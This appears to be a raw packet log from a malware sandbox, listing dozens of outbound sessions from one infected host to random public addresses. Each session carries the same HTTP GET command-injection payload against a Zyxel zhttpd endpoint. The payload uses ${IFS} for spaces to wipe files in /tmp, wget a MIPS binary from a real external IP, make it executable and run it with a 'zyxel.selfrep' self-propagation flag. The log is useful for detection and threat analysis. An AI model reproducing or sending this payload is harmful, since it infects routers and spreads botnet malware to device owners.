                                            Jan 14, 2024 15:50:16.132972002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            174192.168.2.2346882151.243.229.104443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.133059025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            175192.168.2.2348250221.148.159.61443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.133100033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            176192.168.2.2358416106.155.174.42443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.133137941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            177192.168.2.2353852182.34.76.22443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.133197069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            178192.168.2.2349512204.140.24.150443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.133218050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            179192.168.2.2334122204.7.53.169443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.133245945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            180192.168.2.2355402118.28.132.6443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.133312941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            181192.168.2.233800236.182.181.244443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.133323908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            182192.168.2.2341296101.9.227.60443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.133387089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            183192.168.2.2342472202.248.48.89443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.133440018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            184192.168.2.2357168114.4.255.201443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.133445024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            185192.168.2.2336570132.120.155.88443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.133491039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            186192.168.2.2342408129.178.244.220443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.133511066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            187192.168.2.235613874.198.1.116443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.133537054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            188192.168.2.2345388132.224.15.246443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.133582115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            189192.168.2.235908892.107.187.80443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.133610964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            190192.168.2.234580479.210.123.113443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.133677959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            191192.168.2.2339552178.89.82.82443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.133683920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            192192.168.2.2354720114.224.19.11443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.133702040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            193192.168.2.233728824.164.95.66443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.133754015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            194192.168.2.2350510145.144.247.170443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.133805990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            195192.168.2.2355806131.56.250.35443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.133840084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            196192.168.2.234476219.113.121.127443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.133840084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            197192.168.2.234736471.33.120.106443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.133872986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            198192.168.2.2349872118.191.110.24443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.133872986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            199192.168.2.2337880171.216.223.228443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.133944035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            200192.168.2.233542295.38.224.40443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.133974075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            201192.168.2.23562942.93.157.83443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.133989096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            202192.168.2.234335640.103.225.173443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.134020090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            203192.168.2.2344918186.171.228.56443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.134094954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            204192.168.2.235421067.42.82.172443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.134098053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            205192.168.2.2341656112.21.238.39443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.134144068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            206192.168.2.2348060223.88.127.170443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.134145975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            207192.168.2.2340260183.8.131.201443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.134171009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            208192.168.2.2345942147.75.66.238443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.134233952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            209192.168.2.235908489.112.85.178443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.134254932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            210192.168.2.23437325.58.75.120443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.134311914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            211192.168.2.2332948165.163.244.25443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.134311914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            212192.168.2.2334576139.66.180.71443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.134354115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            213192.168.2.2352730130.213.41.115443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.134397984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            214192.168.2.234453092.105.164.8443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.134424925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            215192.168.2.2338432114.85.91.199443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.134440899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            216192.168.2.2358256132.101.13.89443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.134490967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            217192.168.2.236019857.70.142.56443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.134536982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            218192.168.2.235690662.130.111.205443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.134608984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            219192.168.2.2357832223.37.177.206443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.134666920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            220192.168.2.2357430114.227.156.57443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.134669065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            221192.168.2.233473062.70.237.160443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.134669065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            222192.168.2.236050273.90.181.245443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.134720087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            223192.168.2.2345392206.84.199.197443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.134733915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            224192.168.2.2340254101.125.28.129443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.134787083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            225192.168.2.2359816194.120.42.8443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.134845972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            226192.168.2.233601288.201.229.123443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:17.139942884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            227192.168.2.2349542136.228.195.69443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:17.139949083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            228192.168.2.2338374164.170.251.139443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:17.139991999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            229192.168.2.235478012.137.248.3443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:17.139991999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            230192.168.2.234687054.98.104.176443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:17.140012026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            231192.168.2.235031464.146.81.209443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:17.140012026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            232192.168.2.235106012.209.120.126443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:17.140073061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            233192.168.2.233593857.2.183.80443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:17.140075922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            234192.168.2.235771257.69.188.246443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:17.140105963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            235192.168.2.2345604216.104.194.41443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:17.140117884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            236192.168.2.2343334124.37.147.250443
                                            TimestampBytes transferredDirectionData
